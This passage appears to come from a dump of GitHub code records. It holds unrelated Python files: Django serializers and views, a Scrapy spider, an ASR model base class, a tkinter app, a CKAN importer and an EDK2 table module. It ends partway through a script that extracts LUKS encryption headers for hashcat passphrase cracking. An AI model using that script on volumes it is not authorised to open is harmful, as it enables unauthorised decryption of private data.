import models\nfrom gemtown.users import models as user_models\nfrom gemtown.songs import models as song_models\nfrom gemtown.modelphotos import models as modelphoto_models\nimport time\n\nclass TimestampField(serializers.Field):\n def to_representation(self, value):\n return int(time.mktime(value.timetuple()))\n\nclass UserSerializer(serializers.ModelSerializer): \n class Meta:\n model = user_models.User\n fields = (\n 'id',\n 'username',\n )\n\nclass SongSerializer(serializers.ModelSerializer): \n class Meta:\n model = song_models.Song\n fields = (\n 'id',\n 'title',\n )\n\nclass MusicCopyrightSerializer(serializers.ModelSerializer): \n song = SongSerializer()\n creator = UserSerializer()\n created_at = TimestampField()\n updated_at = TimestampField()\n class Meta:\n model = models.MusicCopyright \n fields = (\n 'id',\n 'song',\n 'block_chain_txid',\n 'block_chain_id',\n 'confirm_status',\n 'creator',\n 'created_at',\n 'updated_at',\n )\n\nclass ModelPhotoCopyrightSerializer(serializers.ModelSerializer): \n modelphoto = modelphoto_models.ModelPhoto\n creator = UserSerializer()\n created_at = TimestampField()\n updated_at = TimestampField()\n class Meta:\n model = models.ModelPhotoCopyright \n fields = (\n 'id',\n 'modelphoto',\n 'block_chain_txid',\n 'block_chain_id',\n 'confirm_status',\n 'creator',\n 'created_at',\n 'updated_at',\n )\n","repo_name":"doramong0926/gemtown","sub_path":"gemtown/copyrights/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37025917275","text":"\"\"\"This module contains supporting functions for the SMM estimation.\"\"\"\nimport os\n\nimport numpy as np\n\nfrom respy.pre_processing.data_processing import process_dataset\nfrom respy.python.shared.shared_auxiliary import dist_class_attributes\nfrom respy.fortran.interface import write_resfort_initialization\nfrom respy.python.shared.shared_constants import ROOT_DIR, HUGE_FLOAT\nfrom respy_smm.auxiliary_depreciation import respy_obj_from_new_init\nfrom respy.python.simulate.simulate_auxiliary import get_random_types\nfrom respy.python.simulate.simulate_auxiliary import get_random_edu_start, \\\n get_random_lagged_start\n\nfrom respy_smm.src import smm_interface\n\n\ndef get_mpi():\n \"\"\"This function returns the MPI connector (if possible)\"\"\"\n try:\n from mpi4py import MPI\n return MPI\n except ImportError:\n return None\n\n\ndef format_column(x):\n \"\"\"This function provides pretty floats for the columns.\"\"\"\n if isinstance(x, str):\n return '{}'.format(x)\n else:\n return '{:25.5f}'.format(x)\n\n\ndef smm_sample_f2py(state_space_info, initial_conditions, disturbances, slavecomm_f2py, respy_obj):\n \"\"\"This function is a wrapper that is supposed to facilitate the application of SMM\n estimation for the RESPY package.\"\"\"\n\n sample_edu_start, sample_lagged_start = initial_conditions\n periods_draws_emax, periods_draws_sims = disturbances\n\n labels = list()\n labels += ['num_periods', 'edu_spec', 'optim_paras', 'num_draws_emax', 'is_debug']\n labels += ['is_interpolated', 'num_points_interp', 'is_myopic', 'num_agents_sim', \"num_paras\"]\n labels += ['num_procs', 'num_types', 'seed_sim']\n\n num_periods, edu_spec, optim_paras, num_draws_emax, is_debug, is_interpolated, \\\n num_points_interp, is_myopic, num_agents_sim, num_paras, num_procs, num_types, seed_sim = \\\n dist_class_attributes(respy_obj, *labels)\n\n np.random.seed(seed_sim)\n\n 
shocks_cholesky = optim_paras['shocks_cholesky']\n coeffs_common = optim_paras['coeffs_common']\n coeffs_home = optim_paras['coeffs_home']\n coeffs_edu = optim_paras['coeffs_edu']\n coeffs_a = optim_paras['coeffs_a']\n coeffs_b = optim_paras['coeffs_b']\n delta = optim_paras['delta']\n\n type_spec_shares = optim_paras['type_shares']\n type_spec_shifts = optim_paras['type_shifts']\n\n args = (num_types, optim_paras, num_agents_sim, sample_edu_start, is_debug)\n sample_types = get_random_types(*args)\n\n args = state_space_info + (coeffs_common, coeffs_a, coeffs_b, coeffs_edu, coeffs_home,\n shocks_cholesky, delta, is_interpolated, num_points_interp, num_draws_emax, num_periods,\n is_myopic, is_debug, periods_draws_emax, num_agents_sim, periods_draws_sims,\n type_spec_shares, type_spec_shifts, edu_spec['start'], edu_spec['max'], edu_spec['lagged'],\n edu_spec['share'], num_paras, sample_edu_start, sample_lagged_start, sample_types,\n slavecomm_f2py)\n\n dat = smm_interface.wrapper_smm(*args)\n\n return dat\n\n\ndef get_communicator(respy_obj, data_array=None):\n \"\"\"This is a temporary function that sets up the communicator.\"\"\"\n\n # There is no data available for the SMM estimation, so we generate a random sample that\n # eases the all code that is coming later.\n if data_array is None:\n data_array = np.random.uniform(size=64).reshape(8, 8)\n\n labels = list()\n labels += ['optim_paras', 'num_periods', 'edu_spec', 'is_debug', 'num_draws_emax']\n labels += ['seed_emax', 'is_interpolated', 'num_points_interp', 'is_myopic', 'tau']\n labels += ['num_procs', 'num_agents_sim', 'num_draws_prob', 'seed_prob', 'seed_sim']\n labels += ['optimizer_options', 'optimizer_used', 'maxfun', 'precond_spec', 'file_sim']\n labels += ['num_paras', 'num_types', 'num_agents_est']\n\n optim_paras, num_periods, edu_spec, is_debug, num_draws_emax, seed_emax, is_interpolated, \\\n num_points_interp, is_myopic, tau, num_procs, num_agents_sim, num_draws_prob, \\\n seed_prob, seed_sim, optimizer_options, optimizer_used, maxfun, precond_spec, \\\n file_sim, num_paras, num_types, num_agents_est = dist_class_attributes(respy_obj, *labels)\n\n args = (optim_paras, is_interpolated, num_draws_emax, num_periods, num_points_interp,\n is_myopic, edu_spec, is_debug, num_draws_prob, num_agents_sim, seed_prob, seed_emax,\n tau, num_procs, 'simulate', seed_sim, optimizer_options, optimizer_used, maxfun, num_paras,\n precond_spec, file_sim, data_array, num_types, num_agents_est)\n\n write_resfort_initialization(*args)\n\n MPI = get_mpi()\n info = MPI.Info.Create()\n info.Set('wdir', os.getcwd())\n\n test = ROOT_DIR + '/.bld/fortran/resfort_slave'\n worker = MPI.COMM_SELF.Spawn(test, info=info, maxprocs=num_procs - 1)\n\n return worker\n\n\ndef is_valid_covariance_matrix(shocks_coeffs_new):\n sds, rho = shocks_coeffs_new[:4], shocks_coeffs_new[4:]\n\n shocks_cov = np.zeros((4, 4))\n\n shocks_cov[1, 0] = rho[0] * sds[1] * sds[0]\n shocks_cov[2, 0] = rho[1] * sds[2] * sds[0]\n shocks_cov[2, 1] = rho[2] * sds[2] * sds[1]\n shocks_cov[3, 0] = rho[3] * sds[3] * sds[0]\n shocks_cov[3, 1] = rho[4] * sds[3] * sds[1]\n shocks_cov[3, 2] = rho[5] * sds[3] * sds[2]\n\n np.fill_diagonal(shocks_cov, sds ** 2)\n\n shocks_cov = shocks_cov + shocks_cov.T - np.diag(shocks_cov.diagonal())\n try:\n np.linalg.cholesky(shocks_cov)\n return True\n except np.linalg.linalg.LinAlgError:\n return False\n\n\ndef get_processed_dataset(init_file):\n respy_obj = respy_obj_from_new_init(init_file)\n data_array = process_dataset(respy_obj).values\n 
data_array[np.isnan(data_array)] = HUGE_FLOAT\n data_array = np.ascontiguousarray(data_array, np.float64)\n\n return data_array\n\n\ndef get_initial_conditions(respy_obj):\n # TODO: Cleanup the attribute list, not all needed.\n labels = list()\n labels += ['num_procs', 'num_periods', 'is_debug', 'seed_emax', 'seed_sim']\n labels += ['num_draws_emax', 'num_agents_sim', 'num_types', 'edu_spec', 'version']\n\n num_procs, num_periods, is_debug, seed_emax, seed_sim, num_draws_emax, num_agents_sim, \\\n num_types, edu_spec, version = dist_class_attributes(respy_obj, *labels)\n\n np.random.seed(seed_sim)\n sample_edu_start = get_random_edu_start(edu_spec, num_agents_sim, is_debug)\n sample_lagged_start = get_random_lagged_start(edu_spec, num_agents_sim, sample_edu_start,\n is_debug)\n\n return sample_edu_start, sample_lagged_start\n","repo_name":"mo2561057/respy_estimagic","sub_path":"respy_smm/auxiliary.py","file_name":"auxiliary.py","file_ext":"py","file_size_in_byte":6510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22908789208","text":"import scrapy\nfrom scrapy.contrib.spiders import CrawlSpider, Rule\nfrom scrapy.contrib.linkextractors.lxmlhtml import LxmlLinkExtractor\nfrom aragog.items import AragogItem\nimport datetime\nfrom pymongo import MongoClient\nfrom scrapy.conf import settings\nfrom scrapy.http.request import Request\n\nclass AmazonUpdateSpider(CrawlSpider):\n\tname = 'aragogUpdate'\n\tallowed_domains = ['amazon.in']\t\n\tstart_urls = [ ]\n\t# rules = (\n\t# \tRule(LxmlLinkExtractor(allow=(r'\\/([A-Z])([A-Z0-9]{9})'),deny=(r'product\\-reviews',r'offer\\-listing')),callback='parse_item'),\n\t# \t)\n\t\t\n\tdef __init__(self):\n\t\tclient = MongoClient(\n\t\t\tsettings['MONGODB_SERVER'],\n\t\t\tsettings['MONGODB_PORT']\n\t\t)\n\n\t\tdb = client[settings['MONGODB_DB']]\n\t\tself.collection = db[settings['MONGODB_COLLECTION']]\n\n\tdef start_requests(self):\n\t\turls = self.collection.find({},{\"url\":1,\"_id\":0})\n\t\tfor url in urls:\n\t\t\tyield Request(url[\"url\"], self.parse)\n\n\tdef parse(self,response):\n\t\titem = AragogItem()\n\t\ttry:\n\t\t\titem['name'] = response.xpath('//*[@id=\"productTitle\"]/text()').extract()[0].encode('ascii','ignore')\n\t\t\titem['reviews'] = response.xpath('//*[@id=\"acrCustomerReviewText\"]/text()').extract()[0].encode('ascii','ignore')\n\t\t\titem['url'] = response.url\n\t\t\titem['rating'] = response.xpath('//*[@id=\"avgRating\"]/span/text()').extract()[0].encode('ascii','ignore').replace('\\n',' ').strip()\n\t\t\titem['pid'] = response.url.split('/ref=')[0].split('/')[-1].encode('ascii','ignore')\n\t\t\titem['price'] = [response.xpath('//*[@id=\"price\"]/table//span[starts-with(@id,\"priceblock\")]//text()').extract()[1].encode('ascii','ignore').strip()]\n\t\t\titem['desc'] = [desc.encode('ascii','ignore') for desc in response.xpath('//*[@id=\"feature-bullets\"]/ul/li/span/text()').extract() ]\n\t\t\titem['timestamp'] = [str(datetime.datetime.now())]\n\t\t\tprint(item)\n\t\texcept:\n\t\t\tprint('Not a product!')\n\t\t\titem = None\n\t\tyield item\n\n\tdef dummy(self,response):\n\t\tprint(str(response.url))","repo_name":"kbyagnik/Amazon-PriceTracker","sub_path":"src/aragog/aragog/spiders/update_spider.py","file_name":"update_spider.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"53"} +{"seq_id":"44030303260","text":"import tensorflow as tf\n\nfrom tensorflow_asr.utils import env_util, 
file_util\n\n\nclass BaseModel(tf.keras.Model):\n def save(\n self,\n filepath,\n overwrite=True,\n include_optimizer=True,\n save_format=None,\n signatures=None,\n options=None,\n save_traces=True,\n ):\n with file_util.save_file(filepath) as path:\n super().save(\n filepath=path,\n overwrite=overwrite,\n include_optimizer=include_optimizer,\n save_format=save_format,\n signatures=signatures,\n options=options,\n save_traces=save_traces,\n )\n\n def save_weights(\n self,\n filepath,\n overwrite=True,\n save_format=None,\n options=None,\n ):\n with file_util.save_file(filepath) as path:\n super().save_weights(filepath=path, overwrite=overwrite, save_format=save_format, options=options)\n\n def load_weights(\n self,\n filepath,\n by_name=False,\n skip_mismatch=False,\n options=None,\n ):\n with file_util.read_file(filepath) as path:\n super().load_weights(filepath=path, by_name=by_name, skip_mismatch=skip_mismatch, options=options)\n\n @property\n def metrics(self):\n if not hasattr(self, \"_tfasr_metrics\"):\n self._tfasr_metrics = {}\n return list(self._tfasr_metrics.values())\n\n def add_metric(\n self,\n metric: tf.keras.metrics.Metric,\n ):\n if not hasattr(self, \"_tfasr_metrics\"):\n self._tfasr_metrics = {}\n self._tfasr_metrics[metric.name] = metric\n\n def make(self, *args, **kwargs):\n \"\"\"Custom function for building model (uses self.build so cannot overwrite that function)\"\"\"\n raise NotImplementedError()\n\n def compile(\n self,\n loss,\n optimizer,\n run_eagerly=None,\n **kwargs,\n ):\n self.use_loss_scale = False\n if not env_util.has_devices(\"TPU\"):\n optimizer = tf.keras.mixed_precision.experimental.LossScaleOptimizer(tf.keras.optimizers.get(optimizer), \"dynamic\")\n self.use_loss_scale = True\n self.add_metric(metric=tf.keras.metrics.Mean(name=\"loss\", dtype=tf.float32))\n super().compile(optimizer=optimizer, loss=loss, run_eagerly=run_eagerly, **kwargs)\n\n # -------------------------------- STEP FUNCTIONS -------------------------------------\n\n def train_step(self, batch):\n \"\"\"\n Args:\n batch ([tf.Tensor]): a batch of training data\n\n Returns:\n Dict[tf.Tensor]: a dict of validation metrics with keys are the name of metric\n\n \"\"\"\n inputs, y_true = batch\n with tf.GradientTape() as tape:\n y_pred = self(inputs, training=True)\n loss = self.loss(y_true, y_pred)\n if self.use_loss_scale:\n scaled_loss = self.optimizer.get_scaled_loss(loss)\n if self.use_loss_scale:\n gradients = tape.gradient(scaled_loss, self.trainable_weights)\n gradients = self.optimizer.get_unscaled_gradients(gradients)\n else:\n gradients = tape.gradient(loss, self.trainable_weights)\n self.optimizer.apply_gradients(zip(gradients, self.trainable_variables))\n self._tfasr_metrics[\"loss\"].update_state(loss)\n return {m.name: m.result() for m in self.metrics}\n\n def test_step(self, batch):\n \"\"\"\n Args:\n batch ([tf.Tensor]: a batch of validation data\n\n Returns:\n Dict[tf.Tensor]: a dict of validation metrics with keys are the name of metric prefixed with \"val_\"\n\n \"\"\"\n inputs, y_true = batch\n y_pred = self(inputs, training=False)\n loss = self.loss(y_true, y_pred)\n self._tfasr_metrics[\"loss\"].update_state(loss)\n return {m.name: m.result() for m in self.metrics}\n\n def predict_step(self, batch):\n \"\"\"\n Args:\n batch ([tf.Tensor]): a batch of testing data\n\n Returns:\n [tf.Tensor]: stacked tensor of shape [B, 3] with each row is the text [truth, greedy, beam_search]\n \"\"\"\n inputs, y_true = batch\n labels = 
self.text_featurizer.iextract(y_true[\"labels\"])\n greedy_decoding = self.recognize(inputs)\n if self.text_featurizer.decoder_config.beam_width == 0:\n beam_search_decoding = tf.map_fn(lambda _: tf.convert_to_tensor(\"\", dtype=tf.string), labels)\n else:\n beam_search_decoding = self.recognize_beam(inputs)\n return tf.stack([labels, greedy_decoding, beam_search_decoding], axis=-1)\n\n # -------------------------------- INFERENCE FUNCTIONS -------------------------------------\n\n def recognize(self, *args, **kwargs):\n \"\"\"Greedy decoding function that used in self.predict_step\"\"\"\n raise NotImplementedError()\n\n def recognize_beam(self, *args, **kwargs):\n \"\"\"Beam search decoding function that used in self.predict_step\"\"\"\n raise NotImplementedError()\n\n # ---------------------------------- TFLITE ---------------------------------- #\n\n def make_tflite_function(\n self,\n *args,\n **kwargs,\n ):\n pass\n","repo_name":"TensorSpeech/TensorFlowASR","sub_path":"tensorflow_asr/models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":5262,"program_lang":"python","lang":"en","doc_type":"code","stars":877,"dataset":"github-code","pt":"53"} +{"seq_id":"70790536809","text":"from django.shortcuts import render, HttpResponseRedirect\nfrom .models import Email\nfrom django.core.mail import send_mail\nfrom .forms import EmailForm\nfrom django.conf import settings\n\ndef send(request):\n\n if request.method == 'POST':\n form = EmailForm(request.POST)\n if form.is_valid():\n # print(form.cleaned_data['email'])\n subject = form.cleaned_data['subject']\n to = []\n to.append(form.cleaned_data['to'])\n body = form.cleaned_data['body']\n send_mail(subject=subject, from_email=settings.EMAIL_HOST_USER, message=body, recipient_list=to, fail_silently=False)\n return render(request, 'home.html', {})\n form = EmailForm()\n return render(request, 'send.html', {'form':form})","repo_name":"jatin196/dashboard","sub_path":"send_email/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18534827687","text":"#5) Escreva um algoritmo para ler um número inteiro (do teclado) e escrever (na tela) o seu antecessor\n\ndef leiaint(msg):\n ok = False\n valor = 0\n while True:\n n = str(input(msg))\n if n.isnumeric():\n valor = int(n)\n ok = True\n else:\n print('\\033[0;31mERRO! 
Digite um número válido.\\033[m')\n if ok:\n break\n return valor\n\nn = leiaint('Digite um número: ')\nprint(f'Você acabou de digitar o número {n}, e seu antecessor é {n-1}.')\n\n\n\n\n","repo_name":"brunocroft86/exercicios-do-joao","sub_path":"ex005.py","file_name":"ex005.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22157057877","text":"from tkinter import *\r\nfrom tkinter.ttk import *\r\nfrom io import open\r\n\r\nwindows=Tk()\r\nwindows.title(\"Covid 2020\")\r\nselected=IntVar()\r\n\r\ndef click():\r\n if selected.get()==1:\r\n pantalla=\"\"\"\r\nCoahuila de Zaragoza:\r\nCasos= 22,338\r\nRecuperados= 16,967\r\nMuertes= 1,452\r\n\"\"\"\r\n archivo=open(\"coahuila.txt\",\"w\")\r\n archivo.write(pantalla)\r\n archivo=open(\"coahuila.txt\",\"r\")\r\n text=archivo.read()\r\n archivo.close()\r\n print(text)\r\n \r\n elif selected.get()==2:\r\n pantalla=\"\"\"\r\nPuebla:\r\nCasos= 27,527\r\nRecuperados= 17,538\r\nMuertes= 3,620\r\n\"\"\"\r\n archivo=open(\"puebla.txt\",\"w\")\r\n archivo.write(pantalla)\r\n archivo=open(\"puebla.txt\",\"r\")\r\n text=archivo.read()\r\n archivo.close()\r\n print(text)\r\n \r\n elif selected.get()==3:\r\n pantalla=\"\"\"\r\nSonora:\r\nCasos= 21,761\r\nRecuperados= 15,271\r\nMuertes= 2,678\r\n\"\"\"\r\n archivo=open(\"sonora.txt\",\"w\")\r\n archivo.write(pantalla)\r\n archivo=open(\"sonora.txt\",\"r\")\r\n text=archivo.read()\r\n archivo.close()\r\n print(text)\r\n \r\n elif selected.get()==4:\r\n pantalla=\"\"\"\r\nTabasco:\r\nCasos= 29,815\r\nRecuperados= 22,376\r\nMuertes= 2,620\r\n\"\"\"\r\n archivo=open(\"tabasco.txt\",\"w\")\r\n archivo.write(pantalla)\r\n archivo=open(\"tabasco.txt\",\"r\")\r\n text=archivo.read()\r\n archivo.close()\r\n print(text)\r\n \r\n else:\r\n pantalla=\"\"\"\r\nTamaulipas:\r\nCasos= 24,913\r\nRecuperados= 19,575\r\nMuertes= 1,850\r\n\"\"\"\r\n archivo=open(\"tamaulipas.txt\",\"w\")\r\n archivo.write(pantalla)\r\n archivo=open(\"tamaulipas.txt\",\"r\")\r\n text=archivo.read()\r\n archivo.close()\r\n print(text)\r\n\r\nboton1=Radiobutton(windows,text=\"Coahuila\",value=1, variable=selected)\r\nboton2=Radiobutton(windows,text=\"Puebla\",value=2, variable=selected)\r\nboton3=Radiobutton(windows,text=\"Sonora\",value=3, variable=selected)\r\nboton4=Radiobutton(windows,text=\"Tabasco\",value=4, variable=selected)\r\nboton5=Radiobutton(windows,text=\"Tamaulipas\",value=5, variable=selected)\r\nimp=Button(windows,text=\"Imprimir\",command=click)\r\n\r\nboton1.grid(column=0,row=0)\r\nboton2.grid(column=1,row=0)\r\nboton3.grid(column=2,row=0)\r\nboton4.grid(column=3,row=0)\r\nboton5.grid(column=4,row=0)\r\nimp.grid(column=5,row=0)\r\n\r\nwindows.mainloop()\r\n","repo_name":"melissa040601/PROGRAMACION-II-MELISSA-FLORES","sub_path":"Melissa Flores Colunga.py","file_name":"Melissa Flores Colunga.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74428552807","text":"from django import template\n\nfrom pyconcz_2016.announcements.models import Announcement\n\nregister = template.Library()\n\n\n@register.inclusion_tag('announcements/latest.html')\ndef latest_announcement():\n try:\n item = Announcement.objects.all().latest()\n except Announcement.DoesNotExist:\n item = None\n\n return {'item': 
item}\n","repo_name":"pyvec/cz.pycon.org-2016","sub_path":"pyconcz_2016/announcements/templatetags/announcement_tags.py","file_name":"announcement_tags.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"37608638459","text":"## @file\r\n# This file is used to create/update/query/erase table for files\r\n#\r\n# Copyright (c) 2008 - 2018, Intel Corporation. All rights reserved.<BR>
\r\n# SPDX-License-Identifier: BSD-2-Clause-Patent\r\n#\r\n\r\n##\r\n# Import Modules\r\n#\r\nfrom __future__ import print_function\r\nimport Common.LongFilePathOs as os\r\n\r\nimport Common.EdkLogger as EdkLogger\r\nfrom CommonDataClass import DataClass\r\nfrom CommonDataClass.DataClass import FileClass\r\n\r\n## Convert to SQL required string format\r\ndef ConvertToSqlString(StringList):\r\n return map(lambda s: \"'\" + s.replace(\"'\", \"''\") + \"'\", StringList)\r\n\r\n## TableFile\r\n#\r\n# This class defined a common table\r\n#\r\n# @param object: Inherited from object class\r\n#\r\n# @param Cursor: Cursor of the database\r\n# @param TableName: Name of the table\r\n#\r\nclass Table(object):\r\n _COLUMN_ = ''\r\n _ID_STEP_ = 1\r\n _ID_MAX_ = 0x80000000\r\n _DUMMY_ = 0\r\n\r\n def __init__(self, Cursor, Name='', IdBase=0, Temporary=False):\r\n self.Cur = Cursor\r\n self.Table = Name\r\n self.IdBase = int(IdBase)\r\n self.ID = int(IdBase)\r\n self.Temporary = Temporary\r\n\r\n def __str__(self):\r\n return self.Table\r\n\r\n ## Create table\r\n #\r\n # Create a table\r\n #\r\n def Create(self, NewTable=True):\r\n if NewTable:\r\n self.Drop()\r\n\r\n if self.Temporary:\r\n SqlCommand = \"\"\"create temp table IF NOT EXISTS %s (%s)\"\"\" % (self.Table, self._COLUMN_)\r\n else:\r\n SqlCommand = \"\"\"create table IF NOT EXISTS %s (%s)\"\"\" % (self.Table, self._COLUMN_)\r\n EdkLogger.debug(EdkLogger.DEBUG_8, SqlCommand)\r\n self.Cur.execute(SqlCommand)\r\n self.ID = self.GetId()\r\n\r\n ## Insert table\r\n #\r\n # Insert a record into a table\r\n #\r\n def Insert(self, *Args):\r\n self.ID = self.ID + self._ID_STEP_\r\n if self.ID >= (self.IdBase + self._ID_MAX_):\r\n self.ID = self.IdBase + self._ID_STEP_\r\n Values = \", \".join(str(Arg) for Arg in Args)\r\n SqlCommand = \"insert into %s values(%s, %s)\" % (self.Table, self.ID, Values)\r\n EdkLogger.debug(EdkLogger.DEBUG_5, SqlCommand)\r\n self.Cur.execute(SqlCommand)\r\n return self.ID\r\n\r\n ## Query table\r\n #\r\n # Query all records of the table\r\n #\r\n def Query(self):\r\n SqlCommand = \"\"\"select * from %s\"\"\" % self.Table\r\n self.Cur.execute(SqlCommand)\r\n for Rs in self.Cur:\r\n EdkLogger.verbose(str(Rs))\r\n TotalCount = self.GetId()\r\n\r\n ## Drop a table\r\n #\r\n # Drop the table\r\n #\r\n def Drop(self):\r\n SqlCommand = \"\"\"drop table IF EXISTS %s\"\"\" % self.Table\r\n try:\r\n self.Cur.execute(SqlCommand)\r\n except Exception as e:\r\n print(\"An error occurred when Drop a table:\", e.args[0])\r\n\r\n ## Get count\r\n #\r\n # Get a count of all records of the table\r\n #\r\n # @retval Count: Total count of all records\r\n #\r\n def GetCount(self):\r\n SqlCommand = \"\"\"select count(ID) from %s\"\"\" % self.Table\r\n Record = self.Cur.execute(SqlCommand).fetchall()\r\n return Record[0][0]\r\n\r\n def GetId(self):\r\n SqlCommand = \"\"\"select max(ID) from %s\"\"\" % self.Table\r\n Record = self.Cur.execute(SqlCommand).fetchall()\r\n Id = Record[0][0]\r\n if Id is None:\r\n Id = self.IdBase\r\n return Id\r\n\r\n ## Init the ID of the table\r\n #\r\n # Init the ID of the table\r\n #\r\n def InitID(self):\r\n self.ID = self.GetId()\r\n\r\n ## Exec\r\n #\r\n # Exec Sql Command, return result\r\n #\r\n # @param SqlCommand: The SqlCommand to be executed\r\n #\r\n # @retval RecordSet: The result after executed\r\n #\r\n def Exec(self, SqlCommand):\r\n EdkLogger.debug(EdkLogger.DEBUG_5, SqlCommand)\r\n self.Cur.execute(SqlCommand)\r\n RecordSet = self.Cur.fetchall()\r\n return RecordSet\r\n\r\n def 
SetEndFlag(self):\r\n pass\r\n\r\n def IsIntegral(self):\r\n Result = self.Exec(\"select min(ID) from %s\" % (self.Table))\r\n if Result[0][0] != -1:\r\n return False\r\n return True\r\n\r\n def GetAll(self):\r\n return self.Exec(\"select * from %s where ID > 0 order by ID\" % (self.Table))\r\n\r\n\r\n## TableDataModel\r\n#\r\n# This class defined a table used for data model\r\n#\r\n# @param object: Inherited from object class\r\n#\r\n#\r\nclass TableDataModel(Table):\r\n _COLUMN_ = \"\"\"\r\n ID INTEGER PRIMARY KEY,\r\n CrossIndex INTEGER NOT NULL,\r\n Name VARCHAR NOT NULL,\r\n Description VARCHAR\r\n \"\"\"\r\n def __init__(self, Cursor):\r\n Table.__init__(self, Cursor, 'DataModel')\r\n\r\n ## Insert table\r\n #\r\n # Insert a record into table DataModel\r\n #\r\n # @param ID: ID of a ModelType\r\n # @param CrossIndex: CrossIndex of a ModelType\r\n # @param Name: Name of a ModelType\r\n # @param Description: Description of a ModelType\r\n #\r\n def Insert(self, CrossIndex, Name, Description):\r\n (Name, Description) = ConvertToSqlString((Name, Description))\r\n return Table.Insert(self, CrossIndex, Name, Description)\r\n\r\n ## Init table\r\n #\r\n # Create all default records of table DataModel\r\n #\r\n def InitTable(self):\r\n EdkLogger.verbose(\"\\nInitialize table DataModel started ...\")\r\n Count = self.GetCount()\r\n if Count is not None and Count != 0:\r\n return\r\n for Item in DataClass.MODEL_LIST:\r\n CrossIndex = Item[1]\r\n Name = Item[0]\r\n Description = Item[0]\r\n self.Insert(CrossIndex, Name, Description)\r\n EdkLogger.verbose(\"Initialize table DataModel ... DONE!\")\r\n\r\n ## Get CrossIndex\r\n #\r\n # Get a model's cross index from its name\r\n #\r\n # @param ModelName: Name of the model\r\n # @retval CrossIndex: CrossIndex of the model\r\n #\r\n def GetCrossIndex(self, ModelName):\r\n CrossIndex = -1\r\n SqlCommand = \"\"\"select CrossIndex from DataModel where name = '\"\"\" + ModelName + \"\"\"'\"\"\"\r\n self.Cur.execute(SqlCommand)\r\n for Item in self.Cur:\r\n CrossIndex = Item[0]\r\n\r\n return CrossIndex\r\n\r\n","repo_name":"CloverHackyColor/CloverBootloader","sub_path":"BaseTools/Source/Python/Ecc/MetaFileWorkspace/MetaDataTable.py","file_name":"MetaDataTable.py","file_ext":"py","file_size_in_byte":6144,"program_lang":"python","lang":"en","doc_type":"code","stars":4186,"dataset":"github-code","pt":"53"} +{"seq_id":"10613347964","text":"from rdflib.namespace import Namespace, RDF, RDFS\nfrom glob import glob\nfrom os.path import isfile\nfrom pprint import PrettyPrinter\nimport ckan.logic as logic\nimport ckan.model as model\nfrom ckanapi import RemoteCKAN\nimport xml.etree.ElementTree as ET\n\n#tree = ET.parse('area-type-table.xml')\ntree = ET.parse('cf-standard-name-table.xml')\nroot = tree.getroot()\n\ndemo = RemoteCKAN('http://127.0.0.1:5000', apikey='')\n\ntitle = \"CF conventions\"\n\nfor title in root.iter('title'):\n title = title.text\n\n# tx = demo.call_action('taxonomy_show', {\n# 'uri': 'http://cfconventions.org'})\n\n\ntx = demo.call_action('taxonomy_create', {\n 'title': 'CF Standard Names',\n 'name': 'CF Standard Names',\n 'last_modified': '2017-03-28',\n 'uri': 'http://cfconventions.org'\n })\n\nfor entry in root.findall('entry'):\n label = entry.get('id')\n description = entry[0].text\n # print(description)\n\n try:\n nd = demo.call_action('taxonomy_term_create', {\n 'label': label,\n 'uri': None,\n 'description': description,\n 'taxonomy_id': tx['id'],\n 'parent_id': None\n })\n print(label)\n except:\n 
pass\n","repo_name":"ccca-dc/ckanext-taxonomy","sub_path":"create_taxonomy/generate_thesauri_cf_conventions.py","file_name":"generate_thesauri_cf_conventions.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6220534816","text":"#!/usr/bin/python\n\n#Source: https://github.com/paule965/LuksHeader4Hashcat.py\n#rr-20180706\n\nimport binascii, sys, codecs, datetime, os\n\n#dump the first 4096 sectors\ndef main(args):\n\tf = open(sys.argv[1], 'rb')\n\tHeaderData = f.read(2097664) \n\tFilePath = os.path.abspath(sys.argv[1])\n\tf.close()\n\n#is it a valid LUKS?\n\tif not str(binascii.hexlify(HeaderData[0:6]).decode(\"ascii\")) == \"4c554b53babe\":\n\t\tprint(\"Wrong LUKS-Magic! Check/ Change it - exit.\")\n\t\treturn\n\n#is it version1?\n\tif not str(binascii.hexlify(HeaderData[6:8]).decode(\"ascii\")) == \"0001\":\n\t\tprint(\"Wrong LUKS-Version! The script support this time only Version1.\")\n\t\treturn\n\n#parse LUKSDATA\n\tLUKSMagic=HeaderData[0:6]\n\tLUKSVersion=HeaderData[6:8]\n\tLUKSCipherName=HeaderData[8:40]\n\tLUKSCipherMode=HeaderData[40:72]\n\tLUKSCipherSpec=HeaderData[72:104]\n\tLUKSPayloadOffset=HeaderData[104:108]\n\tLUKSKeyBytes=HeaderData[108:112]\n\tLUKSMasterkey=HeaderData[112:132]\n\tLUKSMasterkeySalt=HeaderData[132:164]\n\tLUKSMasterkeyIterations=HeaderData[164:168]\n\tLUKSUUID=HeaderData[168:208]\n\n#look for Payloadoffset...\n\tPayloadOffset = (int(binascii.hexlify(LUKSPayloadOffset).decode(\"ascii\"),16))\n\tif PayloadOffset <= 4096:\n\t\tPayloadData = HeaderData[592:2097664] #Keymaterial + 1 Sector Payload\n\t\n#parse LUKSDATAKeyslots\n\tKeySlotsOffset=0\n\tLUKSKey=[]\n\tLUKSKeyValues={}\n\tfor Keyslots in range(8):\n\t\tLUKSKeyValues[Keyslots] = (\n\t\t\t#State - 